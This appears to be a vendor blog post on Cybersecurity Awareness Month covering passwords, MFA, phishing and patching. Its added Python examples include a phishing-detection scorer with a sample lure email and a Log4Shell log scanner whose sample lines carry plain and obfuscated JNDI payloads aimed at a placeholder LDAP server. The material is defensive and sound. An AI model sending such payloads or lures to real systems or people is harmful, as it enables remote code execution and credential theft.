Cybersecurity Awareness Month
Today's world is more interconnected than ever, both out of necessity (making critical decisions faster in order to save lives) and out of the convenience of sharing information across platforms and technologies.
Cyber awareness matters more every day as reliance on interconnectivity and the internet of things (IoT) keeps growing. Every added dependency on technology and connectivity also creates more potential vulnerabilities for cyber threat actors to attempt to exploit.
That's why cybersecurity awareness is important every day, and why the Cybersecurity and Infrastructure Security Agency (CISA) highlights it to an even greater extent during Cybersecurity Awareness Month each October. The month provides a platform to engage a wider audience on reducing online risk with direct messages and actionable advice.
CISA's continuing message for Cybersecurity Awareness Month in 2024 is "Secure Our World," highlighting that good cyber awareness practices and a strong cyber posture require buy-in and active participation from everyone in critical infrastructure organizations.
Four Key Steps to Better Cybersecurity Posture for Cybersecurity Awareness Month
- Use Strong Passwords
- Recognize and Report Phishing
- Turn on Multi-Factor Authentication
- Update Software
Use Strong Passwords
The 2024 Breached Password Report found that compromised login credentials were responsible for a significant portion of cyberattacks, with 80% of successful breaches stemming from weak or stolen passwords.
Developing, documenting and enforcing a strong password policy is the best way to make sure everyone in your organization follows good password practices and does not fall victim to credential theft.
However, some organizations have moved away from strict complexity rules, because those policies tend to produce complicated passwords that are hard to remember, which users then write down, reuse, or "tweak" from one change to the next.
Password managers can help, but be aware that these tools are themselves targeted by cyber criminals and have been breached as well.
Why are strong passwords a part of cyber awareness month and creating strong cyber posture?
A cyber criminal's ability to crack even one password for one account in your organization can compromise the cyber resiliency of your entire network. A single compromised account is a foothold from which attackers move laterally and escalate privileges. Tactics like password spraying (trying a handful of common passwords against many accounts, rather than many passwords against one account, so lockout thresholds are never tripped) mean that one weak password anywhere in the organization is enough to gain that foothold, which is why strong passwords and strong password policies are critical.
(Learn more about creating cyber resiliency by downloading our free on-demand webinar – Creating Cyber Resiliency: Policies, Procedures and Planning)
In Verizon’s 2024 Data Breach Investigation Report, stolen credentials were involved in 83% of breaches in Public Administration with a total of 1,085 incidents with confirmed data disclosure.
Estimated Time It Takes To Crack A Password?
The rapid advancement of artificial intelligence is continually cutting down the time cyber criminals need to crack passwords.
Studies from 2023 and 2024 show that 51% of common passwords can be cracked in under a minute, and 65% within an hour. For example, AI tools such as PassGAN can crack a 7-character password in less than six minutes, even if it includes a symbol. Note that these timings describe offline cracking of stolen password hashes: they depend heavily on how the hashes were stored (a fast unsalted hash like MD5 versus a slow, salted one like bcrypt) and do not apply to online guessing against a login form that rate-limits or locks out accounts.
(Download our free webinar: Rise of AI in Cyber Warfare: Threats and Threat Detection to see examples of how AI is making password cracking easier.)
What Should Go Into Constructing A Strong Password?
- Password Length
  - 8 is too short! Go for a minimum of 12, preferably 14+
- Complexity
  - Mix character types (upper and lower case, digits, symbols), but in a way you can remember
- Randomness
  - Predictability undoes length and complexity: a long password that is still a word plus a year is easy to guess
- Freshness
  - Be prepared if your agency forces password changes
- Be creative
  - Use a different password each time; don't "tweak" the old one by changing a digit or a symbol
- Lock out users after three failures
  - But not forever: ten minutes is sufficient
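The two numeric rules above (length versus guessability, and the three-failures / ten-minute lockout) are easy to reason about in code. The following is an added example, not part of the original post or of SecuLore's tooling. The entropy figure is an upper bound that assumes every character was chosen uniformly from the character classes used, and the guess rates in `GUESS_RATES` are assumed order-of-magnitude numbers for one GPU rig, not measurements; the example passwords are constructed.

```python
import math
import time

# Character classes and how many symbols each adds to the assumed alphabet
# (the 95 printable ASCII characters: 26 + 26 + 10 + 32 punctuation + 1 space).
_CLASSES = (
    (str.islower, 26),
    (str.isupper, 26),
    (str.isdigit, 10),
    (lambda c: not c.isalnum() and not c.isspace(), 32),
    (str.isspace, 1),
)

def charset_size(password: str) -> int:
    """Size of the smallest class-union alphabet covering every character used."""
    return sum(n for pred, n in _CLASSES if any(pred(c) for c in password))

def entropy_bits(password: str) -> float:
    """Upper bound on entropy: assumes each character was picked uniformly at random
    from the alphabet above. Words, dates and keyboard walks are far weaker, so treat
    this as a ceiling, never a guarantee."""
    if not password:
        return 0.0
    return len(password) * math.log2(charset_size(password))

def crack_time_seconds(bits: float, guesses_per_second: float) -> float:
    """Expected time for an offline attacker to hit the password after trying half
    of a keyspace of 2**bits candidates at the given rate."""
    return (2.0 ** bits) / 2.0 / guesses_per_second

# Assumed, order-of-magnitude guess rates (illustrative, not measured).
GUESS_RATES = {
    "fast unsalted hash (e.g. MD5)": 1e11,
    "slow adaptive hash (e.g. bcrypt)": 1e5,
}

def human(seconds: float) -> str:
    for unit, size in (("years", 31_557_600), ("days", 86_400), ("hours", 3_600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:.1f} seconds"

class LoginGuard:
    """Online side of the policy: lock an account for `lockout_seconds` after
    `max_failures` consecutive bad attempts, then let the lock expire on its own.
    `clock` is injectable so the behaviour can be tested without sleeping."""

    def __init__(self, max_failures: int = 3, lockout_seconds: int = 600, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.clock = clock
        self._failures = {}
        self._locked_until = {}

    def is_locked(self, user: str) -> bool:
        until = self._locked_until.get(user)
        if until is None:
            return False
        if self.clock() < until:
            return True
        # Lock has expired: clear it together with the failure counter.
        del self._locked_until[user]
        self._failures.pop(user, None)
        return False

    def attempt(self, user: str, password_ok: bool) -> str:
        """Returns 'ok', 'fail' or 'locked'. A correct password is refused while locked,
        so an attacker cannot tell a lockout apart from a wrong guess."""
        if self.is_locked(user):
            return "locked"
        if password_ok:
            self._failures.pop(user, None)
            return "ok"
        count = self._failures.get(user, 0) + 1
        self._failures[user] = count
        if count >= self.max_failures:
            self._locked_until[user] = self.clock() + self.lockout_seconds
            return "locked"
        return "fail"

if __name__ == "__main__":
    for pw in ("Summer24", "Summer2024!!", "correct-horse-battery"):  # constructed examples
        bits = entropy_bits(pw)
        print(f"{pw!r}: {len(pw)} chars, alphabet {charset_size(pw)}, at most {bits:.1f} bits")
        for label, rate in GUESS_RATES.items():
            print(f"   {label}: about {human(crack_time_seconds(bits, rate))}")
```

Running it shows why the list says 8 is too short: going from 8 to 12 characters of the same alphabet multiplies the keyspace by the alphabet size to the fourth power, and the hash algorithm moves the answer by another six orders of magnitude. The lockout class is deliberately clock-injected so the ten-minute expiry can be exercised in a unit test.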
What SHOULD you avoid when creating a password, and what advice should you include in a password policy?
- Avoid consecutive keyboard combinations
  - qwerty or asdfg
  - 123456
- Avoid names & birthdays (PII)
  - Kids, spouse, pets, or other relatives
  - These can often be found easily on social media
- The same rules apply to security questions
  - If an attacker can answer your security questions from public information, they can reset your password, gaining access and locking you out. An unexpected password reset is evidence you may have been compromised.
(Learn more about password policies in our free webinar – Practical Principles for PSAPs)
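A policy is only as good as its enforcement at the moment a password is chosen. The check below is an added example, not code from the original post: it rejects the items in the two lists above (short passwords, keyboard walks such as qwerty/asdfg/123456, names and birthdays the user has registered, and "tweaks" of the previous password). The keyboard rows, the four-character walk length and the sample passwords and PII values are assumptions chosen for illustration.

```python
import re

# Physical QWERTY rows plus the number row; runs along these (forward or backward) are predictable.
_KEYBOARD_ROWS = ("qwertyuiop", "asdfghjkl", "zxcvbnm", "1234567890")

def _walks(length: int) -> frozenset:
    """Every forward or backward run of `length` adjacent keys along one row."""
    runs = set()
    for row in _KEYBOARD_ROWS:
        for seq in (row, row[::-1]):
            runs.update(seq[i:i + length] for i in range(len(seq) - length + 1))
    return frozenset(runs)

_WALKS = _walks(4)

def has_keyboard_walk(password: str) -> bool:
    lowered = password.lower()
    return any(run in lowered for run in _WALKS)

def _core(password: str) -> str:
    """Lowercase and strip leading/trailing digits and symbols, so 'Summer2023!' and
    'Summer2024!' both collapse to 'summer'. This is the classic tweak the list warns about."""
    return re.sub(r"^[^a-z]+|[^a-z]+$", "", password.lower())

def is_tweak_of(new: str, old: str) -> bool:
    n, o = new.lower(), old.lower()
    core = _core(n)
    return bool(o) and ((bool(core) and core == _core(o)) or n in o or o in n)

def check_policy(password: str, pii=(), previous=()) -> list:
    """Return every violation found; an empty list means the password passes.
    `pii` holds names, pet names, birthdays etc. registered for the user or public about
    them. `previous` is checked at change time, when the user has just typed the old
    password, so nothing needs to be stored in clear for the similarity test."""
    problems = []
    if len(password) < 12:
        problems.append("too short (minimum 12, prefer 14+)")
    classes = sum(bool(re.search(p, password)) for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"))
    if classes < 3:
        problems.append("use at least three character classes")
    if has_keyboard_walk(password):
        problems.append("contains a keyboard sequence")
    lowered = password.lower()
    for item in pii:
        token = item.lower()
        digits = re.sub(r"\D", "", item)  # '03/14/1987' -> '03141987'
        hit = (len(token) >= 3 and token in lowered) or (
            len(digits) >= 4 and (digits in password or digits[-4:] in password)  # full date or just the year
        )
        if hit:
            problems.append(f"contains personal information ({item})")
    if any(is_tweak_of(password, old) for old in previous):
        problems.append("too similar to a previous password")
    return problems

if __name__ == "__main__":
    # Constructed examples: a pet name and a birthday the user registered, plus the last password.
    for pw in ("Qwerty123456!!", "Max!Buddy1987xyz", "Winter-Garden-2024", "correct horse battery staple 9!"):
        print(pw, "->", check_policy(pw, pii=["Buddy", "03/14/1987"], previous=["Winter-Garden-2023"]) or "OK")
```

The PII check is deliberately loose (any 3+ character token, and the year alone from a date), because the attacker building a wordlist from social media will try exactly those fragments.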
Strong passwords are your first line of defense against cyber threats. Don’t settle for weak combinations.
Turn On Multi-Factor Authentication
Strong passwords alone aren't enough, which is why Cybersecurity Awareness Month touts the importance of multi-factor authentication (MFA). If a password is compromised, the second factor creates a barrier: whoever is trying to log in to the account must also provide additional information or complete an additional action before the login succeeds.
Common second factors used after the password:
- A one-time passcode delivered by text message or email, or generated by an authenticator app
- Biometrics
- Security keys
- Login links sent to a registered address or device
Not all second factors are equal: codes sent by SMS or email can be intercepted or phished along with the password, while FIDO2 security keys are bound to the site's origin and resist phishing.
Multi-factor authentication draws on three kinds of factors:
- Something you have
  - Keys
  - ID card
  - Phone
- Something you are
  - Retinal scan
  - Fingerprint
- Something you know
  - Passwords
(This is also covered in our free webinar, Creating Cyber Resiliency: Policies, Procedures and Planning)
Where should you use MFA?
- On accounts with your financial info like banks and online stores
- On accounts with personal info, like social media and healthcare apps
- On accounts with info you use for work
Passwordless options are also becoming more popular, because not having to remember multiple complicated passwords, or not having a password that could be compromised at all, reduces both risk and burden.
However, legacy technology, training, data privacy, interoperability, and regulatory considerations are still barriers to wider adoption, which is why strong passwords and multi-factor authentication remain important until more of those barriers are addressed.
MFA by itself is not enough either, and it is a target of cyber criminals with evolving tools. In fact, the 2024 State of Phishing Report found over 1 million attacks launched per month using MFA-bypass frameworks, typically adversary-in-the-middle phishing kits that proxy the real login page and relay the victim's one-time code or session cookie in real time.
Recognize And Report Phishing
Exploiting the human element is still the most used attack method because it remains the most effective. Convincing people to willingly hand over login credentials and other sensitive information, through emails, links, and public information anyone can find, means cyber criminals don't need to spend many resources on more sophisticated attack methods.
The low-effort and highly-effective method of phishing attacks in many forms is a key reason why recognizing and reporting phishing is a main element of focus during Cybersecurity Awareness Month.
How Prevalent Is Phishing?
- 90% of all cyber attacks begin with phishing (CISA)
- As of Q1 2024, it is estimated that 3.4 billion phishing emails are sent a day and about 36% of all data breaches involve phishing
- There are now nearly 75 times as many phishing sites as there are other malware sites on the internet (Google Safe Browsing)
- The APWG observed 1,077,501 phishing attacks in the 4th quarter of 2023
- APWG observed almost 5 million phishing attacks in 2023, the worst year for phishing on record
- 8 out of 10 organizations had at least one person fall victim to a phishing attempt.
6 Most Common Phishing Attacks
- Deceptive Phishing
  - Email from a recognized sender, or impersonating a legitimate entity, to obtain personal data or login credentials
- Spear Phishing
  - A customized attack, often built from social media, that uses information or people the target is familiar with to get them to click malicious links and give up data or credentials
- Whaling
  - Targets executives: gaining access to a CEO's email to authorize financial transfers, or to data that can be sold on the dark web
- Vishing
  - Uses a phone call, with caller ID spoofing to mimic trusted entities, to steal sensitive data or funds
- Smishing
  - Uses text messages to get the target to click malicious links
- Pharming
  - Targets a DNS server (or the resolver the victim uses) and changes the IP address associated with a domain name to redirect users to a malicious website of the attacker's choosing
(Get expert insights into different phishing methods to be aware of and how to strengthen your cyber posture in our webinar – Phishing Tournaments: Don't Get Caught in the Net.)
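The deceptive and spear-phishing lures described above leave mechanical traces that a mail gateway or a report-triage script can score before a human ever reads the message: a display name that smuggles a different address than the real sender, a Reply-To pointing at a third domain, link text that names one domain while the href goes to another, bare-IP or punycode hosts, and pressure language. The following is an added example, not code from the original post or from any product mentioned on it; the two messages are constructed (reserved `.example` domains and a documentation IP address), and the urgency keyword list and the crude two-label domain reduction are assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

URGENCY = ("urgent", "immediately", "within 24 hours", "will be suspended", "verify now", "act now")

class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def _registrable(host: str) -> str:
    """Crude 'domain.tld' reduction (no public-suffix list): fine for corp.example vs
    login.corp.example, wrong for co.uk-style suffixes."""
    return ".".join(host.lower().split(".")[-2:])

def _domain_of(address: str) -> str:
    return address.rpartition("@")[2].lower()

def phishing_indicators(raw_message: str) -> list:
    """Return indicator codes found in one RFC 822 message (empty list = nothing suspicious)."""
    msg = message_from_string(raw_message)
    found = []
    from_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = _domain_of(from_addr)

    # 1. Display name carries an address whose domain differs from the real sender's.
    shown = re.search(r"[\w.+-]+@([\w.-]+)", from_name)
    if shown and shown.group(1).lower() != from_domain:
        found.append("display-name-domain-mismatch")

    # 2. Replies are routed to a different domain than the sender's.
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and _domain_of(reply_to) != from_domain:
        found.append("reply-to-mismatch")

    body = msg.get_payload(decode=True).decode(msg.get_content_charset() or "utf-8", "replace")
    parser = _AnchorCollector()
    parser.feed(body)
    for href, text in parser.links:
        host = (urlparse(href).hostname or "").lower()
        # 3. Visible link text names one domain, the href goes to another.
        shown_url = re.search(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", text, re.I)
        if shown_url and _registrable(shown_url.group(1)) != _registrable(host):
            found.append("link-text-mismatch")
        # 4. Bare IP or punycode (xn--) label: rarely legitimate in corporate mail.
        if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host) or any(l.startswith("xn--") for l in host.split(".")):
            found.append("link-host-ip-or-punycode")

    # 5. Pressure language in subject or body (tags stripped first).
    text_all = (msg.get("Subject", "") + " " + re.sub(r"<[^>]+>", " ", body)).lower()
    if any(k in text_all for k in URGENCY):
        found.append("urgency-language")
    return found

# Constructed sample lure. Addresses use reserved .example names; the IP is a documentation address.
SAMPLE_PHISH = """\
From: "Payroll <payroll@corp.example>" <notify@secure-mailer.example.net>
Reply-To: payroll-desk@mail-verify.example.org
To: jane@corp.example
Subject: Urgent: action required on your direct deposit
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your direct deposit will be suspended unless you verify now.</p>
<p><a href="http://198.51.100.23/verify">https://corp.example/payroll</a></p>
</body></html>
"""

# Constructed benign message for comparison.
SAMPLE_CLEAN = """\
From: Jane Doe <jane@corp.example>
To: bob@corp.example
Subject: Lunch Thursday?
Content-Type: text/html; charset="utf-8"

<html><body><p>Menu is on <a href="https://intranet.corp.example/menu">the intranet</a>.</p></body></html>
"""

if __name__ == "__main__":
    print("lure   :", phishing_indicators(SAMPLE_PHISH))
    print("benign :", phishing_indicators(SAMPLE_CLEAN))
```

None of these indicators is proof on its own (marketing mail routinely trips the urgency check), which is why the function returns the full list rather than a verdict: the number and combination of hits is what should drive quarantine versus a warning banner versus delivery.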
Train To Recognize And Report Phishing Attempts
Awareness makes you up to 40% safer against potential phishing scams and attacks.
Training to recognize and report phishing attempts is more important than ever given the impact AI is having on phishing. Cyber criminals have been able to use AI tools similar to ChatGPT, and to build their own language models, to write more realistic phishing emails.
What does training to recognize phishing scams look like?
It means setting up a training course so everyone in your organization learns to spot the signs of a potential phishing email, and reminding them to report it.
A very basic and easy phishing tip everyone should follow is the "3 Second Rule": take a moment to think before you click a link or open an attachment in an email. Is it urgent? Were you expecting it? Those are the questions to ask in the few seconds before clicking a link in any email.
AI Used To Write Phishing Emails
Artificial intelligence is probably having a bigger impact on phishing than on password cracking, which makes training to spot phishing emails even more important: AI can make the language in these emails nearly indistinguishable from legitimate mail. Spelling errors, grammar mistakes and odd phrasing used to be reliable signs of a phishing email, but AI has cleaned much of that up, so those tells are far less dependable than before.
Social Engineering And Phishing
The main tool cyber criminals use in phishing is you. Not only do they count on poor cyber awareness habits, such as clicking links without thinking, but information that is personally relevant to you is their best weapon, and we make it easier to find than ever. Cyber criminals use familiarity, curiosity, and fear to manipulate a target's behavior and gain access to critical systems, data, and infrastructure.
Update Software
Weak passwords, missing multi-factor authentication, and no phishing training make it easy for cyber criminals to attack critical networks; not updating software or applying security patches makes it just as easy, if not easier, to breach your network. Even worse, exploiting an unpatched security flaw can let an attacker bypass controls such as MFA entirely.
Zero-day exploits surged significantly in 2023, with a notable 50% increase in vulnerabilities compared to 2022. Google observed 97 zero-day vulnerabilities actively exploited in 2023.
(Learn lessons from our cyber experts about how to handle zero-day exploits and protect your network, including software updates and patching, in our free, on-demand webinar – What Can I Do About Zero Day Exploits?)
These attacks are highly relevant in public safety and government because these sectors often rely on third-party vendors for security solutions. The use of these enterprise technologies makes them susceptible to zero-day vulnerabilities, which, once exploited, can lead to large-scale data breaches or compromise critical infrastructure.
This is a big reason why updating software is a key area of focus during Cybersecurity Awareness Month again in 2024.
Any device or software connected to your network is exposed to risk. Installing updates for every piece of software or application in use is important, especially updates that patch security flaws.
How to Reduce the Impact of Zero Day Vulnerabilities
(Patching and software updates continue to be one of the biggest lessons learned from cyber attacks. Get more insights from our experts into what to take away from cyber threats in 2023, Lessons Learned From 2023's Cyber Worst.)
- Patch management (as soon as patches are available)
- Vulnerability management
- Attack surface management (ASM)
- Threat intelligence
- Anomaly-based detection methods
Automated patch management helps you deploy patches quickly, shrinking the window between a fix becoming available and attackers finding and exploiting the vulnerability in your systems.
Vulnerability assessments also provide an organization with the necessary knowledge, awareness and risk backgrounds to understand and react to threats to its environment.
Log4Shell was one of the most devastating software flaws of the past several years. Applying patches immediately and updating to fixed versions of Log4j was among the most important steps to mitigate further and future damage from exploitation of the vulnerability.
- In 2023, zero-day exploits increased significantly, with 97 vulnerabilities actively exploited in the wild, marking a 50% rise from 2022
- Reports from 2023 revealed that over 60% of network and security appliances had zero-day vulnerabilities that were exploited before patches were available
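Log4Shell is a good case for pairing two of the measures listed above, vulnerability management and anomaly-based detection, because both sides are mechanical. The following is an added example, not code from the original post: one function classifies a `log4j-core` version against the fixed releases on the main 2.x line (2.0-beta9 through 2.14.1 vulnerable to CVE-2021-44228, anything below 2.17.1 still needing an update for the follow-up CVEs; the older Java 6/7 maintenance branches have their own fixed releases and are deliberately not modelled), and a scanner looks for `${jndi:...}` probes in web-server log lines after collapsing the `${lower:...}`, `${upper:...}` and `${...:-x}` lookups attackers nest to hide the string. The log lines are constructed, with a documentation IP address.

```python
import re

_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9]+))?$")

def parse_version(text: str) -> tuple:
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0). The last element sorts a
    pre-release before the final release of the same number."""
    m = _VERSION.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)

def log4j_status(version: str) -> str:
    """Classify a log4j-core version on the main 2.x line. Java 6/7 branches (2.3.x,
    2.12.x) have their own fixed releases and are not modelled: treat as 'update'."""
    v = parse_version(version)
    if v[0] != 2:
        return "not-log4j2"
    if v <= parse_version("2.14.1"):
        return "vulnerable"   # CVE-2021-44228 range (betas before beta9 treated the same, conservatively)
    if v < parse_version("2.17.1"):
        return "update"       # 44228 fixed, still exposed to the follow-up CVEs
    return "patched"

_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:(?:ldap|rmi|dns|iiop|corba|nds|http)s?://", re.IGNORECASE)

def _resolve_lookup(inner: str):
    """Emulate the Log4j lookups attackers nest to hide 'jndi'. Returns replacement text,
    or None when the lookup is not one of the known obfuscations."""
    if ":-" in inner:                  # ${env:NOPE:-j} and ${::-j} both yield the default 'j'
        return inner.split(":-", 1)[1]
    key, _, arg = inner.partition(":")
    if key.lower() == "lower":         # ${lower:J} -> 'j'
        return arg.lower()
    if key.lower() == "upper":         # ${upper:n} -> 'N'
        return arg.upper()
    return None

def normalize_lookups(s: str, max_depth: int = 20) -> str:
    """Collapse nested lookups innermost-first until nothing changes (depth-bounded)."""
    for _ in range(max_depth):
        changed = False
        def repl(m):
            nonlocal changed
            r = _resolve_lookup(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r
        s = _INNER.sub(repl, s)
        if not changed:
            break
    return s

def find_jndi_probes(lines) -> list:
    """Return (1-based line number, normalized line) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits

# Constructed access-log lines: one benign, three probes (plain and two obfuscated), one benign
# line that merely contains an unrelated ${...} placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:10 +0000] "GET /login HTTP/1.1" 404 0 "-" "${${lower:j}${upper:n}di:${lower:ldap}://198.51.100.7:1389/b}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://198.51.100.7:1099/c}"',
    '10.0.0.12 - - [10/Dec/2021:03:15:00 +0000] "GET /docs/${version} HTTP/1.1" 200 99 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for ver in ("2.0-beta9", "2.14.1", "2.16.0", "2.17.1", "1.2.17"):
        print(f"log4j-core {ver}: {log4j_status(ver)}")
    for n, norm in find_jndi_probes(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

The normalizer is what makes the scanner worth running: a naive grep for `jndi` misses lines 3 and 4 of the sample, and those are the forms that showed up in the wild once the plain string was being filtered.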
Cybersecurity awareness and building cyber resiliency is a team effort and it takes buy-in from your entire organization to help keep your network ready to fight and respond to inevitable cyber threats.
Take advantage of SecuLore’s free cybersecurity resources, from our webinars, blogs, and cyber alerts, as well as our cyber attack database to help you stay up to date on the latest cyber threats and news that impacts your area and industry.
Contact SecuLore today to get help finding cybersecurity solutions, including training for phishing and other best cyber awareness practices for your entire organization, identifying network vulnerabilities with actionable solutions to address them, and our 24/7/365 human monitored SOC team to respond to cyber incidents.
Stay cyber-safe,
Other Resources
- Cybersecurity Awareness Month 2024: Steps to Secure Your Network
- Strengthen Your Defenses: The Essential Steps for Conducting a Cybersecurity Gap Analysis
- Insider Threat Awareness: Protecting Your Network From Within
- Practical Cybersecurity Principles for PSAPs | eBook
- Understanding the New CJIS Cybersecurity Requirements: A Guide